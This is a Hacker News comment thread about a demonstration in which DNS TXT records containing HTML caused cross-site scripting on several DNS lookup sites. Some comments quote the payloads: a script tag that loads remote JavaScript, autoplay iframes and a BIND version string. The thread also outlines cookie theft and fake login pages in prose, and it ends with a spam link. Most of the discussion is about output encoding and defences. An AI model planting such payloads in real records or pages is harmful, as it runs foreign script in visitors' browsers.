13 ms·
TXT Record XSS
- T3RMINATED 12y agohaha lol does this work with other whois websites?
- rbinv 12y agoClever. I didn't get it at first. Never trust user input. Edit: See http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehankins.co.uk&type=TXT&submit=Resolve http://www.dnswatch.info/dns/dnslookup?la=en&host=jamiehanki... for the actual code.
- dspillett 12y ago> Never trust user input. Never trust any input. I think this is a case where people assume that is isn't pure user input because is would have already been parsed/checked/verified. "Oh, its in the DNS system so it must be safe" is worse then "well, it came from our database so it should be fine". Don't even trust something coming out of your own database. You never know what various input checking bugs might have accidentally let in over time.
- arenaninja 12y agoThis is only too true! At work we do CRUD projects, which means user input gets stored in the database. I almost always break other people's work by adding HTML tags to the inputs, navigating back to the page, and seeing markup that shouldn't be there. Even database output needs to be sanitized
- peterwwillis 12y agoDatabase output is application input. All forms of input need to be sanitized, period.
- dspillett 12y agoSame here. It is surprising how many times I've done that over the years and people are both surprised how easy it was but easily convince themselves that "it'll be all right" somehow and they'll fix it later...
- bsamuels 12y agoIn addition to "never trust user input"; Never trust your program's output You should have two sets of sanitization, one that sanitizes incoming data, and one that sanitizes outgoing data.
- billmalarky 12y agoI disagree. Obviously data should be validated. But passing validation, I prefer to store data exactly as the user supplied it and then sanitize on output. That way you always have a copy of the original data assuming things change.
- dspillett 12y agoDefinitely. If it is genuinely invalid, refuse it, otherwise store everything as-is. You don't know on the way in what encoding will be needed on the way out: the same sting could be output later plain, in HTML, in a JS literal, in SQL if someone is daft enough to use ad-hoc unparamerterised queries, and so forth.
- ashearer 12y agoThinking about it as "don't concatenate different data types" leads to even more correct software. Concepts like "trust" and "sanitization" are too often vague and misleading. It might be perfectly valid for TXT records--even trusted and sanitized ones--to contain sequences with left angle brackets that make them look like HTML tags. Either way, that's no excuse for failing to convert the text to HTML (by escaping it) before concatenating it into an HTML page.
- jameshart 12y agoThis is what I always try to press home to developers I work with. It's not 'sanitization', it's encoding. In order to make a web browser display the string I've retrieved from my database, I have to turn it into an HTML representation that will be displayed as that string. In order to use a string in a JavaScript string literal, I need to turn it into a JavaScript string literal which represents the string.
- raldi 12y agoThat link is dead; can you paste it in a comment?
- lugg 12y agoI very much love the pop up adblock complaint thing... I blocked it with right click "block ad" from adblock..
- JamieH 12y agoSo uh. This works on a few websites. A couple I've found http://dig.whois.com.au/dig.php?dom=jamiehankins.co.uk&type=ALL&submit=Dig+Lookup http://dig.whois.com.au/dig.php?dom=jamiehankins.co.uk&type=... http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....
- jpinkerton88 12y agoBeautifully done.
- mc_hammer 12y ago^^ hilarious :)
- nitinag 12y agoOur dns lookup tool is safe from this: https://www.misk.com/tools/#dns/jamiehankins.co.uk https://www.misk.com/tools/#dns/jamiehankins.co.uk
- arenaninja 12y agoOH! Now I get it. Honestly, this is hilarious
- swartkrans 12y agoSo like, what template library are these sites using that doesn't have basic XSS protection. :|
- Havvy 12y agoProbably basic PHP?
- serveradminblog 12y agoMXToolbox is a windows based app
- tekknolagi 12y agoThis is hysterical.
- AsakiIssa 12y agoWasn't expecting that at all! Had several tabs opened and was really confused for a few seconds while I tried to find the tab with 'youtube on autoplay'. Firefox needs to show the 'play' icon for the audio tag.
- xenophonf 12y agoStuff like this is why NoScript and RequestPolicy were invented.
- TallboyOne 12y agoFor making your life living hell in the name of overbearing security measures.
- UweSchmidt 12y agoAh yes. The occasional click to confirm this or whitelist that, that's definitively "living hell". It's the users' resistance to the slightest inconvenience that makes security so hard.
- fsniper 12y agoIt's really a hell. Average website over there is using at least 3 - 4 external domains for css, js, fonts and so. Getting a working website without nearly whitelisting many of them is highly improbable right now.
- UweSchmidt 12y agoYes but you gain a lot of interesting information about what's going on, plus you are back in control. Whitelist places you trust. Keep things blocked that you don't like. If that breaks the experience, walk.
- fsniper 12y ago
- iamwil 12y agoHow does this work?
- JamieH 12y agoThe TXT record isn't being sanitized so it just echos out the script tag which then loads the JS file.
- er0k 12y agojamiehankins.co.uk. 33 IN TXT "<script src='//peniscorp.com/topkek.js'></script>" jamiehankins.co.uk. 33 IN TXT "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>"
- deleted 12y ago[deleted]
- jb55 12y agoUse dig: $ dig txt jamiehankins.co.uk https://gist.github.com/440ef567e4bcc8f7ce34 https://gist.github.com/440ef567e4bcc8f7ce34
- 0x0 12y agoCan it be done with CNAME and SRV records too?
- r0m4n0 12y agoisn't this technically illegal to demonstrate haha?
- __david__ 12y agoWhy on earth would it be illegal?
- DonHopkins 12y agoWhat SHOULD be illegal is not sanitizing all inputs.
- r0m4n0 12y agodam, that got downvoted into oblivion haha. honest question... although i dont believe it should be, a third party injecting javascript to demonstrate an exploit might be...
- tedunangst 12y agoAnybody saying "this is illegal" should be required to cite the law they think is broken and explain why the act in question violates that law.
- maaaats 12y agoHe hasn't injected anything. It's just his public DNS record that this page has chosen to display without sanitizing.
- pbhjpbhj 12y agoI imagine the UK Computer Misuse Act (eg at Section 3, http://www.legislation.gov.uk/ukpga/1990/18 http://www.legislation.gov.uk/ukpga/1990/18) probably covers it if the person who altered the TXT field does so to cause websites to load code on purpose, that purpose being for example to impair (Section 3(2)(a)) the running of the computer [causing Rick Astley to play, defo counts!] - but it can be read to cover pretty much anything. Similarly I imagine something like the CFAA (18 USC 1030) probably has broad enough clauses to make this sort of action technically illegal, at least in some cases? But I'm out of my depth on that one.
- SEJeff 12y agoFrom any Linux (or probably OS X) workstation / server, you can run the command "host -t TXT jaimehankins.co.uk" ie: $ host -t TXT jamiehankins.co.uk ;; Truncated, retrying in TCP mode. jamiehankins.co.uk descriptive text "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>" jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all" jamiehankins.co.uk descriptive text "<script src='//peniscorp.com/topkek.js'></script>" jamiehankins.co.uk descriptive text "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI"
- pkinsky 12y agoThis is hilarious, but what's up with this line? >jamiehankins.co.uk descriptive text "v=spf1 include:spf.mandrillapp.com ?all" Why is mandrillapp.com (tranactional email startup) included?
- JamieH 12y agoIt's my personal domain, I use mandrill for some stuff.
- SEJeff 12y agoHell of a good prank dude, well played sir!
- eli 12y agoIt's an SPF record. By adding your authorized mail servers to your DNS, recipient mail servers can "verify" that a given server is supposed to sending mail for your domain.
- nemetroid 12y agoThat's a legitimate record, not related to the XSS.
- kehrlann 12y agoThis is hilariousy, but could this potentially be a real threat to anything ?
- cnvogel 12y agoWhenever you have credentials stored on the same host as the dns frontend. I imagine that a few domain-registrars will have similar tools available on their servers, so that users can check data on their own domains. Imagine being logged in as your hostmaster account on http://your-registrar.com/ http://your-registrar.com/, and having a malicious website redirect you to http://your-registrar.com/webtools/nslookup-tool.php?domain=domain-with-xss-txt-records.com http://your-registrar.com/webtools/nslookup-tool.php?domain=....
- bsamuels 12y agoidk why youre getting downvoted because it's a good question and people need to ask more security questions. Any website I can inject malicious javascript into, I can steal your cookies from (assuming the httponly flag isn't set on the cookie). If you were logged into one of these whois sites and they didnt have the httponly flag set on your auth cookie, an attacker could send you to a page on the site that contains malicious javascript that could phone home with your auth cookie, letting the attacker hijack your session. You can defend your own websites from these kinds of attacks by setting up a Content Security Policy and using the 'httponly' flag on auth cookies. http://en.wikipedia.org/wiki/Content_Security_Policy http://en.wikipedia.org/wiki/Content_Security_Policy
- lifeformed 12y agoAnother attack is to rewrite the webpage to show the official login screen for that site, and record their password when they enter it.
- tedunangst 12y agoOne can imagine that I trust who.is and will click on links that go there, but now it can redirect me to an evil site that will attempt to exploit my browser.
- 12y ago
- st3fan 12y agoWonderful!
- general_failure 12y agoWell played sir, very well played
- nerdy 12y agoBest POC ever.
- Sanddancer 12y agoGiven how many whois sites cache results, I wonder how many of them are also vulnerable to SQL injections...
- ryan-c 12y agoI enumerated all IPv4 PTR records a few years back, and I saw a couple XSS things there as well. If anyone wants to host that data set somewhere, let me know, would be interesting to see what others do with it. Edit: I found my data and have a grep running on it, will share what turns up. Edit2: Somewhat less exciting than I remember: $ fgrep -- '>' * x.x.101.130.csv:1298607746,155.92.101.130,<hostname>.nebula.msoe.edu. x.x.110.35.csv:1298587462,41.191.110.35,www.ahnigeria.org\032<http://www.ahnigeria.org/> http://www.ahnigeria.org/>. x.x.126.67.csv:1298594206,75.127.126.67,\032>. x.x.229.74.csv:1298608599,139.78.229.74,<hostname>.suites.osuit.edu. x.x.39.239.csv:1298594005,129.89.39.239,<hostname>.uits.uwm.edu. x.x.49.198.csv:1298613894,195.164.49.198,test.str!\@#\$%^&*\(\)}{\":]['><.,end.domain.test.pl. x.x.49.199.csv:1298613720,195.164.49.199,test.str<hr><br>end.domain.test.pl. x.x.49.206.csv:1298603066,195.164.49.206,test.str<hr><bR>omain.test.pl. x.x.88.109.csv:1298606801,95.211.88.109,ilo.>.88.211.95.in-addr.arpa.
- apetresc 12y agoHow large is it, ballpark?
- ryan-c 12y agoIt's about 3.5GB compressed, though in addition to un-LZMAing it a custom unpacker consisting of a few dozen lines of perl is required.
- finnn 12y agoHow big is it? If you put up a torrent I'll seed it...
- jonknee 12y agoLikewise, I have a gigabit internet connection and plenty of extra space.
- tekknolagi 12y agoLikewise
- 12y ago
- bwy 12y agoWish there was a warning, because I accidentally clicked this link in class just now.
- iLoch 12y agoDon't browse with your volume turned up? How do you assume you wont be interacting with any pages that may produce noise?
- _RPM 12y agoAlways put your audio driver on mute when in class or in public setting.
- tedunangst 12y agoI wish browser developers gave a shit about their users instead of continuously inventing new ways for sites to auto play annoying content, but such is life.
- toddgardner 12y agoThe most clever exploit of XSS I've ever seen. Beautiful. Bravo.
- colinbartlett 12y agoBravo, I just embarrassed myself in a very quiet meeting.
- Thaxll 12y agoIt has nothing to to do with TXT record, it's just the website that render html. It could be any source.
- jxf 12y agoIt's related because it's not conventionally thought of as user input that needs to be sanitized (but, of course, it should be).
- jonknee 12y agoIt has everything to do with the TXT record... Every XSS could be summed up with "just the website that renders HTML", but that's pretty much the point. TXT records aren't often thought of as input and as you can see several sites made that mistake of assumption.
- deleted 12y ago[deleted]
- ginvok 12y agoAaaand now I'm deaf :) Gotta learn sign language
- mrb 12y agoI am half serious, but how about making HTML served in TXT records a standard trick for serving small web pages very quickly? There are way fewer network round trips: 1. DNS query for TXT record for example.com 2. DNS reply with HTML content Compared with the traditional 7 steps: 1. DNS query for A record for example.com 2. DNS reply with x.x.x.x 3. TCP SYN to port 80 4. TCP SYN/ACK 5. TCP ACK 6. HTTP GET 7. HTTP reply with HTML content It would also make the content super-distributed, super-reliable, as DNS servers cache it worldwide (and for free so it would reduce hosting costs :D). Also TXT records can contain more than 255 bytes as long as they are split on multiple strings of 255 bytes in a DNS reply. Again, I am only half serious, but this is an interesting thought experiment... Edit: oddtarball: DNSSEC would solve spoofing. And updates should take no longer than the DNS TTL to propagate: the TTL is under your control; you could set it to 60 seconds if you wanted. It is a common, false misconception that many DNS resolvers ignore the TTL. Some large web provider (was it Amazon? I forget) ran an experiment and demonstrated that across tens or hundreds of thousands of clients wordlwide, 99% of them saw DNS updates propagated within X seconds if the TTL was set to X seconds. Only <1% of DNS resolvers were ignoring it.
- marcosdumay 12y agoUse the Kitchen Sink[1] record type. It's more appropriated than TXT. [1] https://tools.ietf.org/html/draft-ietf-dnsind-kitchen-sink-02 https://tools.ietf.org/html/draft-ietf-dnsind-kitchen-sink-0...
- _RPM 12y agoWhen I went to the page, it started playing music. I find that very frustrating and annoying.
- wittrock 12y agoThat's the point--who.is won't play music by itself. Its lookup of the DNS records of jaimehawkins.co.uk injected the music into the page.
- justin66 12y agoYeah... that was actually hugely annoying. A little warning maybe.
- hamburglar 12y agoHere's your warning: if you ever click on an HN link titled "<something> XSS", prepare for something annoying to happen.
- _RPM 12y agoOh I see. This makes sense. This doesn't seem challenging to prevent. A simple replacement of characters on the HTML entity table would have prevented this instead of putting arbitrary text onto standard output.
- 0x0 12y agoYep, missing that is what makes this an "XSS" :)
- finnn 12y agoCorrect. The purpose of this post is to demonstrate yet another class of website that does not validate user input.
- finnn 12y agoCorrect. The purpose of this post is to demonstrate yet another class of website that does not validate user input.
- himanshuy 12y agoWhat's up with the search box?
- MiguelHudnandez 12y agoThat is from topkek.js. Pretty clever! It plays the harlem shake song. One element shakes by itself until the second phase of the song, then lots of other elements start shaking. Cleverness aside, it is practical when looking for XSS vulnerabilities because it's very obvious when you've succeeded in injecting your code.
- sprkyco 12y agoLuckily it does not work on my normal browser: https://www.whitehatsec.com/aviator/ https://www.whitehatsec.com/aviator/
- zobzu 12y agoThat made me laugh, good one :)
- philip1209 12y agoI added FartScroll.js from the Onion to my text records: http://dig.whois.com.au/dig.php?dom=philipithomas.com&type=ALL&submit=Dig+Lookup http://dig.whois.com.au/dig.php?dom=philipithomas.com&type=A...
- moontear 12y ago:-) Thanks for this
- elwell 12y agoYes, a genius combination!
- elwell 12y agoNotice at the bottom of that page it says: Embed a live DIG result (do a diggle): <script type="text/javascript" src="http://dig.whois.com.au/diggle/philipithomas.com"></script> Now, if you embed a 'diggle', that sound like an infinite loop possibility. Interesting, does anyone want to try it?
- elwell 12y agoWow, I think they fixed that escaping problem a few minutes ago.
- philip1209 12y agoI think some of the sites escape semicolons only. Pure script loading isn't broken, but trying to code in the txt may break.
- elwell 12y agoBut I tried your link recently and it no longer works.
- philip1209 12y agoOh you're correct - they did update it. It still works on a few other sites.
- bdpuk 12y agoI've seen similar examples with HTTP headers and sites that display those, nice angle.
- deleted 12y ago[deleted]
- gsharma 12y agoNot sure how Trulia handles input for its usernames, but at one point I was able to do this http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-2860517 http://www.trulia.com/profile/-iframe--home-buyer-loleta-ca-...
- ing33k 12y agogood hack but really stupid of me to click it directly :\
- js2 12y agoAll editors should, upon save, put up the following prompt: "I acknowledge the code just written does not trust its input, under penalty of being whipped by a wet noodle." But I guess folks would just click through. Sigh.
- notastartup 12y agoman...I woke up and got a dose of surprise....love this song.
- jedberg 12y agoCome on people, this is so basic. If you didn't generate the data, don't display it on your web page without filtering it. It blows my mind that this isn't just everyone's default.
- homakov 12y agoYeah, nothing clever at all. Tons of ways for user input, and this one just yet another one.
- kazinator 12y agoSince there is very little discussion in the link, pardon me for stating what may be obvious to some, but not necessarily everyone. The point here is that: 1. DNS TXT records can contain HTML, including scripts and whatever. 2. Domain registrants can publish arbitrary TXT records. 3. TXT records can appear in pages generated by web sites which serve, for instance, as portals for viewing domain registration information, including DNS records such as TXT records. 4. Thus, such sites are vulnerable to perpetrating cross-site-script attacks (XSS) on their visitors if they naively paste the TXT record contents into the surrounding HTML. 5. The victim is the user who executes a query which finds the malicious domain which serves up the malicious TXT record that is interpolated into the displayed results. The user's browser executes the malicious code. Thus, when you are generating UI markup from pieces, do not trust any data that is pulled from any third-party untrusted sources, including seemingly harmless TXT records.
- nhstanley 12y agoThanks for explaining. I know HN is traditionally programmer/programming focused, but some of us come from other areas and only have limited experience with such topics. It's very common for me to enter a thread about a security vulnerability, for example, and think "wait, how big of a deal is this?"
- thomasfl 12y agoFinally somebody found a way to put html injection on to good use.
- gcr 12y agoWarning: this page links to (loud!) automatic playing audio.
- mike-cardwell 12y agoA while ago I experimented with adding stuff to the version.bind field in bind. Just updated it: mike@glue:~$ dig +short chaos txt version.bind @198.211.125.252 "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>" I put this in my named.conf: version "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=1' frameborder='0' allowfullscreen></iframe>"; This site is vulnerable: http://dnscheck.pingdom.com/?domain=grepular.com http://dnscheck.pingdom.com/?domain=grepular.com Although takes a minute before it kicks in. I did report it to them at the time, but never got a response.
- elwell 12y agoIn playing around with this hack, I discovered that Dreamhost doesn't properly escape TXT records in their admin interface when modifying DNS records. I put an iframe in and it shows the box but the src is removed; it also killed the page at that point so I'm unable to remove it...
- Sanddancer 12y agoAdd the domain to your hosts file to make it not resolve, that should fix it.
- elwell 12y ago"the page" referred to dreamhosts admin page
- PaulSec 12y agoI wonder how this got so much points.. Reflected XSS in 2014, yeah..
- indielol 12y agoWouldn't this make it super easy for Google to ban (show the security warnings in Chrome) the domains?
- sanqui 12y agoLooks like the who.is site has patched the exploit up a few minutes ago.
- kk3399 12y agoyes, but not fixed here yet - http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....
- garazy 12y agoI've found about 80 TXT records with <script tags in them - most of them look like the person not understanding where to paste a JavaScript snippet over XSS attempts, here's all of them - http://builtwith.com/script-tags-in-TXT-records.txt http://builtwith.com/script-tags-in-TXT-records.txt There's a few that are "13h.be/x.js" that look like someone trying this out before.
- wqfeng 12y agoCould anyone tell me what's about? I just see a DNS page.
- grimtrigger 12y agoIt was fixed. But if you look ctrl+f "peniscorp" and you'll see a script that was injected on the page
- JamieH 12y agoStill working here if anyone is yet to see it. http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins.co.uk&run=toolpage http://mxtoolbox.com/SuperTool.aspx?action=txt:jamiehankins....
- sidcool 12y agoI opened this link on my Android's Chrome browser. The top search text input started wildly convulsing. First I thought the post was about that. But I didn't really get what this is about.
- ccorcos 12y agoi don't really get it either
- ryanskidmore 12y agoWho.is have fixed it now, but you can still see it in action over at archive.org https://web.archive.org/web/20140918191824/http://who.is/dns/jamiehankins.co.uk https://web.archive.org/web/20140918191824/http://who.is/dns...
- tacotime 12y agooh my god, it's even more entertaining with the wayback machine's page header.
- homakov 12y agoXSS on a shitty website not doing trivial sanitization gets 900 points on HN, oh guys you are disappointing me so much.
- tedchs 12y agoFYI it looks like who.is fixed the XSS bug.
- Cance 12y agoFor more information, visit this site >>>>>>> http://getformulat10.com/ http://getformulat10.com/